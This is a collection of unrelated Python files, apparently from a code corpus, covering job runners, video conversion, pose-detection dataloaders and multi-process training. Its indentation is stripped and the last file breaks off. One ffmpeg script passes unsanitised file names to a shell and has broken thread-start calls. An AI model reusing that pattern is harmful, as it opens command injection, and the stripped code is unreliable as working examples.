self.exit_code_file = os.path.join( files_dir, 'galaxy_%s.ec' % id_tag )
job_name = 'g%s' % id_tag
if self.job_wrapper.tool.old_id:
job_name += '_%s' % self.job_wrapper.tool.old_id
if self.job_wrapper.user:
job_name += '_%s' % self.job_wrapper.user
self.job_name = ''.join( map( lambda x: x if x in ( string.letters + string.digits + '_' ) else '_', job_name ) )
def cleanup( self ):
for file in [ getattr( self, a ) for a in self.cleanup_file_attributes if hasattr( self, a ) ]:
try:
os.unlink( file )
except Exception, e:
log.debug( "(%s/%s) Unable to cleanup %s: %s" % ( self.job_wrapper.get_id_tag(), self.job_id, file, str( e ) ) )
def register_cleanup_file_attribute( self, attribute ):
if attribute not in self.cleanup_file_attributes:
self.cleanup_file_attributes.append( attribute )
class AsynchronousJobRunner( BaseJobRunner ):
"""Parent class for any job runner that runs jobs asynchronously (e.g. via
a distributed resource manager). Provides general methods for having a
thread to monitor the state of asynchronous jobs and submitting those jobs
to the correct methods (queue, finish, cleanup) at appropriate times..
"""
def __init__( self, app, nworkers ):
super( AsynchronousJobRunner, self ).__init__( app, nworkers )
# 'watched' and 'queue' are both used to keep track of jobs to watch.
# 'queue' is used to add new watched jobs, and can be called from
# any thread (usually by the 'queue_job' method). 'watched' must only
# be modified by the monitor thread, which will move items from 'queue'
# to 'watched' and then manage the watched jobs.
self.watched = []
self.monitor_queue = Queue()
def _init_monitor_thread(self):
self.monitor_thread = threading.Thread( name="%s.monitor_thread" % self.runner_name, target=self.monitor )
self.monitor_thread.setDaemon( True )
self.monitor_thread.start()
def handle_stop(self):
# DRMAA and SGE runners should override this and disconnect.
pass
def monitor( self ):
"""
Watches jobs currently in the monitor queue and deals with state
changes (queued to running) and job completion.
"""
while 1:
# Take any new watched jobs and put them on the monitor list
try:
while 1:
async_job_state = self.monitor_queue.get_nowait()
if async_job_state is STOP_SIGNAL:
# TODO: This is where any cleanup would occur
self.handle_stop()
return
self.watched.append( async_job_state )
except Empty:
pass
# Iterate over the list of watched jobs and check state
try:
self.check_watched_items()
except Exception, e:
log.exception('Unhandled exception checking active jobs')
# Sleep a bit before the next state check
time.sleep( 1 )
def monitor_job(self, job_state):
self.monitor_queue.put( job_state )
def shutdown( self ):
"""Attempts to gracefully shut down the monitor thread"""
log.info( "%s: Sending stop signal to monitor thread" % self.runner_name )
self.monitor_queue.put( STOP_SIGNAL )
# Call the parent's shutdown method to stop workers
super( AsynchronousJobRunner, self ).shutdown()
def check_watched_items(self):
"""
This method is responsible for iterating over self.watched and handling
state changes and updating self.watched with a new list of watched job
states. Subclasses can opt to override this directly (as older job runners will
initially) or just override check_watched_item and allow the list processing to
reuse the logic here.
"""
new_watched = []
for async_job_state in self.watched:
new_async_job_state = self.check_watched_item(async_job_state)
if new_async_job_state:
new_watched.append(new_async_job_state)
self.watched = new_watched
# Subclasses should implement this unless they override check_watched_items all together.
def check_watched_item(self):
raise NotImplementedError()
def finish_job( self, job_state ):
"""
Get the output/error for a finished job, pass to `job_wrapper.finish`
and cleanup all the job's temporary files.
"""
galaxy_id_tag = job_state.job_wrapper.get_id_tag()
external_job_id = job_state.job_id
# To ensure that files below are readable, ownership must be reclaimed first
job_state.job_wrapper.reclaim_ownership()
# wait for the files to appear
which_try = 0
while which_try < (self.app.config.retry_job_output_collection + 1):
try:
stdout = shrink_stream_by_size( file( job_state.output_file, "r" ), DATABASE_MAX_STRING_SIZE, join_by="\n..\n", left_larger=True, beginning_on_size_error=True )
stderr = shrink_stream_by_size( file( job_state.error_file, "r" ), DATABASE_MAX_STRING_SIZE, join_by="\n..\n", left_larger=True, beginning_on_size_error=True )
which_try = (self.app.config.retry_job_output_collection + 1)
except Exception, e:
if which_try == self.app.config.retry_job_output_collection:
stdout = ''
stderr = 'Job output not returned from cluster'
log.error( '(%s/%s) %s: %s' % ( galaxy_id_tag, external_job_id, stderr, str( e ) ) )
else:
time.sleep(1)
which_try += 1
try:
# This should be an 8-bit exit code, but read ahead anyway:
exit_code_str = file( job_state.exit_code_file, "r" ).read(32)
except:
# By default, the exit code is 0, which typically indicates success.
exit_code_str = "0"
try:
# Decode the exit code. If it's bogus, then just use 0.
exit_code = int(exit_code_str)
except:
log.warning( "(%s/%s) Exit code '%s' invalid. Using 0." % ( galaxy_id_tag, external_job_id, exit_code_str ) )
exit_code = 0
# clean up the job files
if self.app.config.cleanup_job == "always" or ( not stderr and self.app.config.cleanup_job == "onsuccess" ):
job_state.cleanup()
try:
job_state.job_wrapper.finish( stdout, stderr, exit_code )
except:
log.exception( "(%s/%s) Job wrapper finish method failed" % ( galaxy_id_tag, external_job_id ) )
job_state.job_wrapper.fail( "Unable to finish job", exception=True )
def fail_job( self, job_state ):
if getattr( job_state, 'stop_job', True ):
self.stop_job( self.sa_session.query( self.app.model.Job ).get( job_state.job_wrapper.job_id ) )
job_state.job_wrapper.fail( getattr( job_state, 'fail_message', 'Job failed' ) )
if self.app.config.cleanup_job == "always":
job_state.cleanup()
def mark_as_finished(self, job_state):
self.work_queue.put( ( self.finish_job, job_state ) )
def mark_as_failed(self, job_state):
self.work_queue.put( ( self.fail_job, job_state ) )
|
main.py
|
#!/usr/bin/env python
import os
import subprocess
import threading
import time
import queue
index=0
idx=0
filepath='/Users/joe/Desktop/videos'
outpath='/Users/joe/Desktop/BU_19_Spring/EC500/output-video'
def file_input(filepath):
files = os.listdir(filepath)
q=queue.Queue()
for file in files:
q.put(file)
return q
def ffmpeg_convert_720p(filepath):
q=file_input(filepath)
global index
while not q.empty():
video = q.get()
video_720p = "ffmpeg -i "+filepath+"/"+video+" -s hd720 -b:v 2M -r 30 "+outpath+"/"+video[:-4]+"720.mp4"
subprocess.call(video_720p,shell=True)
print('vedio',index,'has been converted to 720p')
index=index+1
time.sleep(1)
print('All videos converted to 720p!')
def ffmpeg_convert_480p(filepath):
global idx
q=file_input(filepath)
while not q.empty():
video = q.get()
video_480p = "ffmpeg -i "+filepath+"/"+video+" -s hd480 -b:v 1M -r 30 "+outpath+"/"+video[:-4]+"480.mp4"
subprocess.call(video_480p,shell=True)
print('vedio',idx,'has been converted to 480p')
idx=idx+1
time.sleep(1)
print('All videos converted to 480p!')
def main():
start=time.clock()
t1=threading.Thread(target=ffmpeg_convert_720p,args=(filepath))
t1.start
t2=threading.Thread(target=ffmpeg_convert_480p,args=(filepath))
t2.start
#ffmpeg_convert_720p(filepath)
#ffmpeg_convert_480p(filepath)
#print(index)
#print(idx)
consume=time.clock()-start
print("Time used:",consume)
if __name__=="__main__":
main()
|
dataloader_webcam.py
|
import os
import torch
from torch.autograd import Variable
import torch.utils.data as data
import torchvision.transforms as transforms
from PIL import Image, ImageDraw
from SPPE.src.utils.img import load_image, cropBox, im_to_torch
from opt import opt
from yolo.preprocess import prep_image, prep_frame, inp_to_image
from pPose_nms import pose_nms, write_json
from SPPE.src.utils.eval import getPrediction
from yolo.util import write_results, dynamic_write_results
from yolo.darknet import Darknet
from tqdm import tqdm
import cv2
import json
import numpy as np
import sys
import time
import torch.multiprocessing as mp
from multiprocessing import Process
from multiprocessing import Queue as pQueue
from threading import Thread
# import the Queue class from Python 3
if sys.version_info >= (3, 0):
from queue import Queue, LifoQueue
# otherwise, import the Queue class for Python 2.7
else:
from Queue import Queue, LifoQueue
if opt.vis_fast:
from fn import vis_frame_fast as vis_frame
else:
from fn import vis_frame
class WebcamLoader:
def __init__(self, webcam, batchSize=1, queueSize=256):
# initialize the file video stream along with the boolean
# used to indicate if the thread should be stopped or not
self.stream = cv2.VideoCapture(int(webcam))
assert self.stream.isOpened(), 'Cannot capture source'
self.stopped = False
# initialize the queue used to store frames read from
# the video file
self.batchSize = batchSize
self.Q = LifoQueue(maxsize=queueSize)
def start(self):
# start a thread to read frames from the file video stream
t = Thread(target=self.update, args=())
t.daemon = True
t.start()
return self
def update(self):
# keep looping infinitely
i = 0
while True:
# otherwise, ensure the queue has room in it
if not self.Q.full():
img = []
orig_img = []
im_name = []
im_dim_list = []
for k in range(self.batchSize):
(grabbed, frame) = self.stream.read()
# if the `grabbed` boolean is `False`, then we have
# reached the end of the video file
if not grabbed:
self.stop()
return
inp_dim = int(opt.inp_dim)
img_k, orig_img_k, im_dim_list_k = prep_frame(
frame, inp_dim)
img.append(img_k)
orig_img.append(orig_img_k)
im_name.append(str(i) + '.jpg')
im_dim_list.append(im_dim_list_k)
with torch.no_grad():
# Human Detection
img = torch.cat(img)
im_dim_list = torch.FloatTensor(im_dim_list).repeat(1, 2)
self.Q.put((img, orig_img, im_name, im_dim_list))
i = i + 1
else:
with self.Q.mutex:
self.Q.queue.clear()
def videoinfo(self):
# indicate the video info
fourcc = int(self.stream.get(cv2.CAP_PROP_FOURCC))
fps = self.stream.get(cv2.CAP_PROP_FPS)
frameSize = (int(self.stream.get(cv2.CAP_PROP_FRAME_WIDTH)),
int(self.stream.get(cv2.CAP_PROP_FRAME_HEIGHT)))
return (fourcc, fps, frameSize)
def getitem(self):
# return next frame in the queue
return self.Q.get()
def len(self):
# return queue size
return self.Q.qsize()
def stop(self):
# indicate that the thread should be stopped
self.stopped = True
class DetectionLoader:
def __init__(self, dataloder, batchSize=1, queueSize=1024):
# initialize the file video stream along with the boolean
# used to indicate if the thread should be stopped or not
self.det_model = Darknet("yolo/cfg/yolov3-spp.cfg")
self.det_model.load_weights('models/yolo/yolov3-spp.weights')
self.det_model.net_info['height'] = opt.inp_dim
self.det_inp_dim = int(self.det_model.net_info['height'])
assert self.det_inp_dim % 32 == 0
assert self.det_inp_dim > 32
self.det_model.cuda()
self.det_model.eval()
self.stopped = False
self.dataloder = dataloder
self.batchSize = batchSize
# initialize the queue used to store frames read from
# the video file
self.Q = LifoQueue(maxsize=queueSize)
def start(self):
# start a thread to read frames from the file video stream
t = Thread(target=self.update, args=())
t.daemon = True
t.start()
return self
def update(self):
# keep looping the whole dataset
while True:
img, orig_img, im_name, im_dim_list = self.dataloder.getitem()
with self.dataloder.Q.mutex:
self.dataloder.Q.queue.clear()
with torch.no_grad():
# Human Detection
img = img.cuda()
prediction = self.det_model(img, CUDA=True)
# NMS process
dets = dynamic_write_results(prediction,
opt.confidence,
opt.num_classes,
nms=True,
nms_conf=opt.nms_thesh)
if isinstance(dets, int) or dets.shape[0] == 0:
for k in range(len(orig_img)):
if self.Q.full():
time.sleep(2)
self.Q.put((orig_img[k], im_name[k], None, None, None,
None, None))
continue
dets = dets.cpu()
im_dim_list = torch.index_select(im_dim_list, 0,
dets[:, 0].long())
scaling_factor = torch.min(self.det_inp_dim / im_dim_list,
1)[0].view(-1, 1)
# coordinate transfer
dets[:, [1, 3]] -= (self.det_inp_dim - scaling_factor *
im_dim_list[:, 0].view(-1, 1)) / 2
dets[:, [2, 4]] -= (self.det_inp_dim - scaling_factor *
im_dim_list[:, 1].view(-1, 1)) / 2
dets[:, 1:5] /= scaling_factor
for j in range(dets.shape[0]):
dets[j, [1, 3]] = torch.clamp(dets[j, [1, 3]], 0.0,
im_dim_list[j, 0])
dets[j, [2, 4]] = torch.clamp(dets[j, [2, 4]], 0.0,
im_dim_list[j, 1])
boxes = dets[:, 1:5]
scores = dets[:, 5:6]
for k in range(len(orig_img)):
boxes_k = boxes[dets[:, 0] == k]
if isinstance(boxes_k, int) or boxes_k.shape[0] == 0:
if self.Q.full():
time.sleep(2)
self.Q.put((orig_img[k], im_name[k], None, None, None,
None, None))
continue
inps = torch.zeros(boxes_k.size(0), 3, opt.inputResH,
opt.inputResW)
pt1 = torch.zeros(boxes_k.size(0), 2)
pt2 = torch.zeros(boxes_k.size(0), 2)
if self.Q.full():
time.sleep(2)
self.Q.put((orig_img[k], im_name[k], boxes_k,
scores[dets[:, 0] == k], inps, pt1, pt2))
def read(self):
# return next frame in the queue
return self.Q.get()
def len(self):
# return queue len
return self.Q.qsize()
class DetectionProcessor:
def __init__(self, detectionLoader, queueSize=1024):
# initialize the file video stream along with the boolean
# used to indicate if the thread should be stopped or not
self.detectionLoader = detectionLoader
self.stopped = False
# initialize the queue used to store data
self.Q = LifoQueue(maxsize=queueSize)
def start(self):
# start a thread to read frames from the file video stream
t = Thread(target=self.update, args=())
t.daemon = True
t.start()
return self
def update(self):
# keep looping the whole dataset
while True:
with torch.no_grad():
(orig_img, im_name, boxes, scores, inps, pt1,
pt2) = self.detectionLoader.read()
with self.detectionLoader.Q.mutex:
self.detectionLoader.Q.queue.clear()
if boxes is None or boxes.nelement() == 0:
while self.Q.full():
time.sleep(0.2)
self.Q.put(
(None, orig_img, im_name, boxes, scores, None, None))
continue
inp = im_to_torch(cv2.cvtColor(orig_img, cv2.COLOR_BGR2RGB))
inps, pt1, pt2 = crop_from_dets(inp, boxes, inps, pt1, pt2)
while self.Q.full():
time.sleep(0.2)
self.Q.put((inps, orig_img, im_name, boxes, scores, pt1, pt2))
def read(self):
# return next frame in the queue
return self.Q.get()
def len(self):
# return queue len
return self.Q.qsize()
class WebcamDetectionLoader:
def __init__(self, webcam=0, batchSize=1, queueSize=256):
# initialize the file video stream along with the boolean
# used to indicate if the thread should be stopped or not
self.det_model = Darknet("yolo/cfg/yolov3-spp.cfg")
self.det_model.load_weights('models/yolo/yolov3-spp.weights')
self.det_model.net_info['height'] = opt.inp_dim
self.det_inp_dim = int(self.det_model.net_info['height'])
assert self.det_inp_dim % 32 == 0
assert self.det_inp_dim > 32
self.det_model.cuda()
self.det_model.eval()
self.stream = cv2.VideoCapture(int(webcam))
assert self.stream.isOpened(), 'Cannot open webcam'
self.stopped = False
self.batchSize = batchSize
# initialize the queue used to store frames read from
# the video file
self.Q = LifoQueue(maxsize=queueSize)
def len(self):
return self.Q.qsize()
def start(self):
# start a thread to read frames from the file video stream
t = Thread(target=self.update, args=())
t.daemon = True
t.start()
return self
def update(self):
# keep looping
while True:
img = []
inp = []
orig_img = []
im_name = []
im_dim_list = []
for k in range(self.batchSize):
(grabbed, frame) = self.stream.read()
if not grabbed:
continue
# process and add the frame to the queue
inp_dim = int(opt.inp_dim)
img_k, orig_img_k, im_dim_list_k = prep_frame(frame, inp_dim)
inp_k = im_to_torch(orig_img_k)
img.append(img_k)
inp.append(inp_k)
orig_img.append(orig_img_k)
im_dim_list.append(im_dim_list_k)
with torch.no_grad():
ht = inp[0].size(1)
wd = inp[0].size(2)
# Human Detection
img = Variable(torch.cat(img)).cuda()
im_dim_list = torch.FloatTensor(im_dim_list).repeat(1, 2)
im_dim_list = im_dim_list.cuda()
prediction = self.det_model(img, CUDA=True)
# NMS process
dets = dynamic_write_results(prediction,
opt.confidence,
opt.num_classes,
nms=True,
nms_conf=opt.nms_thesh)
if isinstance(dets, int) or dets.shape[0] == 0:
for k in range(len(inp)):
if self.Q.full():
with self.Q.mutex:
self.Q.queue.clear()
self.Q.put((inp[k], orig_img[k], None, None))
continue
im_dim_list = torch.index_select(im_dim_list, 0,
dets[:, 0].long())
scaling_factor = torch.min(self.det_inp_dim / im_dim_list,
1)[0].view(-1, 1)
# coordinate transfer
dets[:, [1, 3]] -= (self.det_inp_dim - scaling_factor *
im_dim_list[:, 0].view(-1, 1)) / 2
dets[:, [2, 4]] -= (self.det_inp_dim - scaling_factor *
im_dim_list[:, 1].view(-1, 1)) / 2
dets[:, 1:5] /= scaling_factor
for j in range(dets.shape[0]):
dets[j, [1, 3]] = torch.clamp(dets[j, [1, 3]], 0.0,
im_dim_list[j, 0])
dets[j, [2, 4]] = torch.clamp(dets[j, [2, 4]], 0.0,
im_dim_list[j, 1])
boxes = dets[:, 1:5].cpu()
scores = dets[:, 5:6].cpu()
for k in range(len(inp)):
if self.Q.full():
with self.Q.mutex:
self.Q.queue.clear()
self.Q.put((inp[k], orig_img[k], boxes[dets[:, 0] == k],
scores[dets[:, 0] == k]))
def videoinfo(self):
# indicate the video info
fourcc = int(self.stream.get(cv2.CAP_PROP_FOURCC))
fps = self.stream.get(cv2.CAP_PROP_FPS)
frameSize = (int(self.stream.get(cv2.CAP_PROP_FRAME_WIDTH)),
int(self.stream.get(cv2.CAP_PROP_FRAME_HEIGHT)))
return (fourcc, fps, frameSize)
def read(self):
# return next frame in the queue
return self.Q.get()
def more(self):
# return True if there are still frames in the queue
return self.Q.qsize() > 0
def stop(self):
# indicate that the thread should be stopped
self.stopped = True
class DataWriter:
def __init__(self,
save_video=False,
savepath='examples/res/1.avi',
fourcc=cv2.VideoWriter_fourcc(*'XVID'),
fps=25,
frameSize=(640, 480),
queueSize=1024):
if save_video:
# initialize the file video stream along with the boolean
# used to indicate if the thread should be stopped or not
self.stream = cv2.VideoWriter(savepath, fourcc, fps, frameSize)
assert self.stream.isOpened(), 'Cannot open video for writing'
self.save_video = save_video
self.stopped = False
self.final_result = []
# initialize the queue used to store frames read from
# the video file
self.Q = Queue(maxsize=queueSize)
if opt.save_img:
if not os.path.exists(opt.outputpath + '/vis'):
os.mkdir(opt.outputpath + '/vis')
def start(self):
# start a thread to read frames from the file video stream
t = Thread(target=self.update, args=())
t.daemon = True
t.start()
return self
def update(self):
# keep looping infinitely
while True:
# if the thread indicator variable is set, stop the
# thread
if self.stopped:
if self.save_video:
self.stream.release()
return
# otherwise, ensure the queue is not empty
if not self.Q.empty():
(boxes, scores, hm_data, pt1, pt2, orig_img,
im_name) = self.Q.get()
orig_img = np.array(orig_img, dtype=np.uint8)
if boxes is None:
if opt.save_img or opt.save_video or opt.vis:
img = orig_img
if opt.vis:
cv2.imshow("AlphaPose Demo", img)
cv2.waitKey(30)
if opt.save_img:
cv2.imwrite(
os.path.join(opt.outputpath, 'vis', im_name),
img)
if opt.save_video:
self.stream.write(img)
else:
# location prediction (n, kp, 2) | score prediction (n, kp, 1)
preds_hm, preds_img, preds_scores = getPrediction(
hm_data, pt1, pt2, opt.inputResH, opt.inputResW,
opt.outputResH, opt.outputResW)
result = pose_nms(boxes, scores, preds_img, preds_scores)
result = {'imgname': im_name, 'result': result}
self.final_result.append(result)
if opt.save_img or opt.save_video or opt.vis:
img = vis_frame(orig_img, result)
if opt.vis:
cv2.imshow("AlphaPose Demo", img)
cv2.waitKey(30)
if opt.save_img:
cv2.imwrite(
os.path.join(opt.outputpath, 'vis', im_name),
img)
if opt.save_video:
self.stream.write(img)
else:
time.sleep(0.1)
def running(self):
# indicate that the thread is still running
time.sleep(0.2)
return not self.Q.empty()
def save(self, boxes, scores, hm_data, pt1, pt2, orig_img, im_name):
# save next frame in the queue
self.Q.put((boxes, scores, hm_data, pt1, pt2, orig_img, im_name))
def stop(self):
# indicate that the thread should be stopped
self.stopped = True
time.sleep(0.2)
def results(self):
# return final result
return self.final_result
def len(self):
# return queue len
return self.Q.qsize()
class Mscoco(data.Dataset):
def __init__(self,
train=True,
sigma=1,
scale_factor=(0.2, 0.3),
rot_factor=40,
label_type='Gaussian'):
self.img_folder = '../data/coco/images' # root image folders
self.is_train = train # training set or test set
self.inputResH = opt.inputResH
self.inputResW = opt.inputResW
self.outputResH = opt.outputResH
self.outputResW = opt.outputResW
self.sigma = sigma
self.scale_factor = scale_factor
self.rot_factor = rot_factor
self.label_type = label_type
self.nJoints_coco = 17
self.nJoints_mpii = 16
self.nJoints = 33
self.accIdxs = (1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16,
17)
self.flipRef = ((2, 3), (4, 5), (6, 7), (8, 9), (10, 11), (12, 13),
(14, 15), (16, 17))
def __getitem__(self, index):
pass
def __len__(self):
pass
def crop_from_dets(img, boxes, inps, pt1, pt2):
'''
Crop human from origin image according to Dectecion Results
'''
imght = img.size(1)
imgwidth = img.size(2)
tmp_img = img
tmp_img[0].add_(-0.406)
tmp_img[1].add_(-0.457)
tmp_img[2].add_(-0.480)
for i, box in enumerate(boxes):
upLeft = torch.Tensor((float(box[0]), float(box[1])))
bottomRight = torch.Tensor((float(box[2]), float(box[3])))
ht = bottomRight[1] - upLeft[1]
width = bottomRight[0] - upLeft[0]
if width > 100:
scaleRate = 0.2
else:
scaleRate = 0.3
upLeft[0] = max(0, upLeft[0] - width * scaleRate / 2)
upLeft[1] = max(0, upLeft[1] - ht * scaleRate / 2)
bottomRight[0] = max(
min(imgwidth - 1, bottomRight[0] + width * scaleRate / 2),
upLeft[0] + 5)
bottomRight[1] = max(
min(imght - 1, bottomRight[1] + ht * scaleRate / 2), upLeft[1] + 5)
inps[i] = cropBox(tmp_img.clone(), upLeft, bottomRight, opt.inputResH,
opt.inputResW)
pt1[i] = upLeft
pt2[i] = bottomRight
return inps, pt1, pt2
|
multipro02.py
|
from multiprocessing import Process
import os
def info(title):
print(title)
print('module name:', __name__)
print('parent process:', os.getppid())
print('process id:', os.getpid())
def f(name):
info('\nsegundo\n')
print('\nBye', name)
if __name__ == '__main__':
info('\nPrimero\n')
p = Process(target=f, args=('Gabriel',))
p.start()
p.join()
|
main.py
|
from __future__ import print_function
import argparse
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.multiprocessing as mp
from train import train, test
# Training settings
parser = argparse.ArgumentParser(description='PyTorch MNIST Example')
parser.add_argument('--batch-size', type=int, default=128, metavar='N',
help='input batch size for training (default: 64)')
parser.add_argument('--test-batch-size', type=int, default=1000, metavar='N',
help='input batch size for testing (default: 1000)')
parser.add_argument('--epochs', type=int, default=10, metavar='N',
help='number of epochs to train (default: 10)')
parser.add_argument('--lr', type=float, default=0.01, metavar='LR',
help='learning rate (default: 0.01)')
parser.add_argument('--momentum', type=float, default=0.5, metavar='M',
help='SGD momentum (default: 0.5)')
parser.add_argument('--seed', type=int, default=1, metavar='S',
help='random seed (default: 1)')
parser.add_argument('--log-interval', type=int, default=10, metavar='N',
help='how many batches to wait before logging training status')
parser.add_argument('--num-processes', type=int, default=8, metavar='N',
help='how many training processes to use (default: 2)')
parser.add_argument('--cuda', action='store_true', default=True,
help='enables CUDA training')
parser.add_argument('--model', default='./mnist.dat')
class Net(nn.Module):
def __init__(self):
super(Net, self).__init__()
self.conv1 = nn.Conv2d(1, 10, kernel_size=5)
self.conv2 = nn.Conv2d(10, 20, kernel_size=5)
self.conv2_drop = nn.Dropout2d()
self.fc1 = nn.Linear(320, 50)
self.fc2 = nn.Linear(50, 10)
def forward(self, x):
x = F.relu(F.max_pool2d(self.conv1(x), 2))
x = F.relu(F.max_pool2d(self.conv2_drop(self.conv2(x)), 2))
x = x.view(-1, 320)
x = F.relu(self.fc1(x))
x = F.dropout(x, training=self.training)
x = self.fc2(x)
return F.log_softmax(x, dim=1)
if __name__ == '__main__':
args = parser.parse_args()
use_cuda = args.cuda and torch.cuda.is_available()
device = torch.device("cuda" if use_cuda else "cpu")
print("Current Device:", device)
dataloader_kwargs = {'pin_memory': True} if use_cuda else {}
torch.manual_seed(args.seed)
mp.set_start_method('spawn')
model = Net().to(device)
model.share_memory() # gradients are allocated lazily, so they are not shared here
processes = []
for rank in range(args.num_processes):
p = mp.Process(target=train, args=(rank, args, model, device, dataloader_kwargs))
# We first train the model across `num_processes` processes
p.start()
processes.append(p)
for p in processes:
p.join()
torch.save(model.state_dict(), args.model)
# Once training is complete, we can test the model
# test(args, model, device, dataloader_kwargs)
|
async_trainer.py
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import time
from threading import Thread
import tensorflow as tf
from reinforceflow import logger
from reinforceflow.core import Stats
from reinforceflow.core.runner import EnvRunner
from reinforceflow.core.schedule import Schedule
from reinforceflow.core.stats import flush_stats
from reinforceflow.trainers.trainer import BaseTrainer
from reinforceflow.utils import tensor_utils
class AsyncTrainer(BaseTrainer):
def __init__(self, agent, thread_agents, maxsteps, batch_size,
logdir, logfreq, log_on_term=True, lr_schedule=None,
render=False, test_env=None, test_render=False,
test_episodes=1, test_maxsteps=5e5):
"""Creates trainer based on Experience Replay buffer.
Args:
agent:
maxsteps (int): Total amount of seen observations.
logdir (str): Path used for summary and checkpoints.
logfreq (int): Checkpoint and summary saving frequency (in seconds).
log_on_term (bool): Whether to log only after episode ends.
lr_schedule (core.Schedule): Learning rate scheduler.
render (bool): Enables game screen rendering.
test_env (gym.Env): Environment instance, used for testing.
test_render (bool): Enables rendering for test evaluations.
test_episodes (int): Number of test episodes. To disable test evaluation, pass 0.
test_maxsteps (int): Maximum step allowed during test per episode.
"""
self.agent = agent
self.maxsteps = maxsteps
self.batch_size = batch_size
self.logdir = logdir
self.logfreq = logfreq
self.log_on_term = log_on_term
self.render = render
self.test_env = test_env
self.test_render = test_render
self.test_episodes = test_episodes
self.test_maxsteps = test_maxsteps
self.lr_schedule = Schedule.create(lr_schedule, agent.opt.lr, maxsteps)
self._last_log_time = time.time()
self._last_target_sync = self.agent.step
self._summary_op = tf.summary.merge_all()
self.thread_agents = thread_agents
self.request_stop = False
self.sync_ops = []
self.thread_stats = []
for th_agent in thread_agents:
th_agent.sess = agent.sess
with tf.device(th_agent.device), tf.variable_scope(th_agent.name):
sync_op = [w.assign(self.agent.weights[i]) for i, w in enumerate(th_agent.weights)]
self.sync_ops.append(sync_op)
tensor_utils.initialize_variables(self.agent.sess)
for th_agent in thread_agents:
self.thread_stats.append(Stats(th_agent))
def train_thread(self, thread_agent, sync_op, stats):
runner = EnvRunner(agent=thread_agent, env=thread_agent.env, batch_size=self.batch_size,
sync_agent=self.agent)
while self.agent.step < self.maxsteps:
if self.request_stop:
return
self.agent.sess.run(sync_op)
obs, action, reward, term, obs_next, traj_ends, infos = runner.sample()
thread_agent.step = self.agent.step
thread_agent.episode = self.agent.episode
stats.add(action, reward, term, infos)
thread_agent.train_on_batch(obs=obs,
actions=action,
rewards=reward,
term=term,
obs_next=obs_next,
traj_ends=traj_ends,
lr=self.lr_schedule.value(self.agent.step),
summarize=False)
def train(self):
"""Starts training."""
writer = tf.summary.FileWriter(self.logdir, self.agent.sess.graph)
threads = []
for thread_agent, sync, stats in zip(self.thread_agents, self.sync_ops, self.thread_stats):
thread_agent.sess = self.agent.sess
t = Thread(target=self.train_thread, args=(thread_agent, sync, stats))
t.daemon = True
t.start()
threads.append(t)
self.request_stop = False
last_log_time = time.time()
try:
while self.agent.step < self.maxsteps:
if time.time() - last_log_time >= self.logfreq:
last_log_time = time.time()
flush_stats(self.thread_stats, name="%s Thread" % self.agent.name,
maxsteps=self.maxsteps, writer=writer)
self.agent.save_weights(self.logdir)
self.agent.test(self.test_env,
self.test_episodes,
max_steps=self.test_maxsteps,
render=self.test_render,
writer=writer)
writer.flush()
if self.render:
[agent.env.render() for agent in self.thread_agents]
time.sleep(0.01)
except KeyboardInterrupt:
logger.info('Caught Ctrl+C! Stopping training process.')
self.request_stop = True
logger.info('Saving progress & performing evaluation.')
self.agent.save_weights(self.logdir)
self.agent.test(self.test_env, self.test_episodes, render=self.test_render)
[t.join() for t in threads]
logger.info('Training finished!')
writer.close()
def save(self):
pass
def load(self):
pass
|
videoio.py
|
from pathlib import Path
from enum import Enum
from collections import deque
import subprocess
import threading
import logging
import cv2
LOGGER = logging.getLogger(__name__)
WITH_GSTREAMER = False
class Protocol(Enum):
FILE = 0
CSI = 1
V4L2 = 2
RTSP = 3
class VideoIO:
"""
Class for video capturing from video files or cameras, and writing video files.
Encoding, decoding, and scaling can be accelerated using the GStreamer backend.
Parameters
----------
size : (int, int)
Width and height of each frame to output.
config : Dict
Camera and buffer configuration.
input_uri : string
URI to an input video file or capturing device.
output_uri : string
URI to an output video file.
proc_fps : int
Estimated processing speed. This depends on compute and scene complexity.
"""
def __init__(self, size, config, input_uri, output_uri=None, proc_fps=30):
self.size = size
self.input_uri = input_uri
self.output_uri = output_uri
self.camera_size = config['camera_size']
self.camera_fps = config['camera_fps']
self.buffer_size = config['buffer_size']
self.protocol = self._parse_uri(self.input_uri)
if WITH_GSTREAMER:
self.cap = cv2.VideoCapture(self._gst_cap_pipeline(), cv2.CAP_GSTREAMER)
else:
self.cap = cv2.VideoCapture(self.input_uri)
self.frame_queue = deque([], maxlen=self.buffer_size)
self.cond = threading.Condition()
self.exit_event = threading.Event()
self.capture_thread = threading.Thread(target=self._capture_frames)
ret, frame = self.cap.read()
if not ret:
raise RuntimeError('Unable to read video stream')
self.frame_queue.append(frame)
width = self.cap.get(cv2.CAP_PROP_FRAME_WIDTH)
height = self.cap.get(cv2.CAP_PROP_FRAME_HEIGHT)
self.fps = self.cap.get(cv2.CAP_PROP_FPS)
self.do_resize = (width, height) != self.size
if self.fps == 0:
self.fps = self.camera_fps # fallback
LOGGER.info('%dx%d stream @ %d FPS', width, height, self.fps)
if self.protocol == Protocol.FILE:
self.capture_dt = 1 / self.fps
else:
# limit capture interval at processing latency for camera
self.capture_dt = 1 / min(self.fps, proc_fps)
if self.output_uri is not None:
Path(self.output_uri).parent.mkdir(parents=True, exist_ok=True)
output_fps = 1 / self.capture_dt
if WITH_GSTREAMER:
self.writer = cv2.VideoWriter(self._gst_write_pipeline(), cv2.CAP_GSTREAMER, 0,
output_fps, self.size, True)
else:
fourcc = cv2.VideoWriter_fourcc(*'avc1')
self.writer = cv2.VideoWriter(self.output_uri, fourcc, output_fps, self.size, True)
def start_capture(self):
"""
Start capturing from video file or device.
"""
if not self.cap.isOpened():
self.cap.open(self._gst_cap_pipeline(), cv2.CAP_GSTREAMER)
if not self.capture_thread.is_alive():
self.capture_thread.start()
def stop_capture(self):
"""
Stop capturing from video file or device.
"""
with self.cond:
self.exit_event.set()
self.cond.notify()
self.frame_queue.clear()
self.capture_thread.join()
def read(self):
"""
Returns the next video frame.
Returns None if there are no more frames.
"""
with self.cond:
while len(self.frame_queue) == 0 and not self.exit_event.is_set():
self.cond.wait()
if len(self.frame_queue) == 0 and self.exit_event.is_set():
return None
frame = self.frame_queue.popleft()
self.cond.notify()
if self.do_resize:
frame = cv2.resize(frame, self.size)
return frame
def write(self, frame):
"""
Writes the next video frame.
"""
assert hasattr(self, 'writer')
self.writer.write(frame)
def release(self):
"""
Closes video file or capturing device.
"""
